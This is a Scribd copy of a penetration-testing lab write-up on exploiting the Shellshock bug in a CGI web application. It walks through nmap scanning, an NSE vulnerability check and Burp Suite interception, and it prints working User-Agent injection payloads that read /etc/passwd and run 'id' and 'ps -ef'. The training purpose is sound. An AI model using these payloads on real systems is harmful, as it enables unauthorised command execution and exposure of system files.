Scribd
Upload
2 views

10.) Shellshock

This document outlines the steps to exploit the Shellshock vulnerability in a web application. It includes commands for checking the target IP, scanning for open ports, and using Burp Suite to modify user-agent headers for executing malicious payloads. The document serves as a reference for completing the lab exercise, not as a comprehensive guide.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
2 views

10.) Shellshock

This document outlines the steps to exploit the Shellshock vulnerability in a web application. It includes commands for checking the target IP, scanning for open ports, and using Burp Suite to modify user-agent headers for executing malicious payloads. The document serves as a reference for completing the lab exercise, not as a comprehensive guide.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

Name Shellshock

URL https://www.attackdefense.com/challengedetails?cid=1911

Type Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: ​Shellshock vulnerability.

Solution:

Step 1: ​Start a terminal and check the IP address of the host.

Command: ​ip addr

Step 2: ​Run Nmap scan on the target IP to find open ports.

Note: ​The target IP will be 192.242.220.3

Command: ​nmap 192.242.220.3


Port 80 is open

Step 3: ​Start firefox and navigate to the target IP.

A website is running at port 80 of the target ip.

Step 4: ​Right-click and select “View Page Source”.


A CGI script is running on the target server.

Step 5: ​Use the Nmap NSE script to check if the server is vulnerable to shellshock attack.

Command: ​nmap --script http-shellshock --script-args “http-shellshock.uri=/gettime.cgi”


192.242.220.3
The server is vulnerable to Shellshock attack.

Step 6: ​Search for the available exploit for shellshock vulnerability.

Step 7: ​The GitHub link contains the steps to exploit the vulnerability.

URL: ​https://github.com/opsxcq/exploit-CVE-2014-6271

The attacker has to craft malicious user-agent in order to exploit the vulnerability.

Step 8: ​Configure Firefox to use Burp Suite. Click on the FoxyProxy plugin icon on the top-right
of the browser and select "Burp Suite"
Step 9: ​Start Burp Suite, Navigate to Web Application Analysis Menu and select "burpsuite".
Click on Next
Click on Start Burp button.

Step 10:​ Reload the page and intercept the request with Burp Suite.

Right-click and select ​“Send to Repeater” ​Option and Navigate to the Repeater tab.
Step 11: ​Modify the User-Agent and inject the malicious payload.

Payload: ​() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Click on the ​Send ​button.


The command executed successfully.

Step 12: ​Modify the payload to execute the ​‘id’ ​command.

Payload: ​() { :; }; echo; echo; /bin/bash -c 'id'

Step 13: ​Modify the payload to execute ​‘ps -ef’​ command.

Payload: ​() { :; }; echo; echo; /bin/bash -c 'ps -ef'


References:
● Shellshock (​https://github.com/opsxcq/exploit-CVE-2014-6271​)

You might also like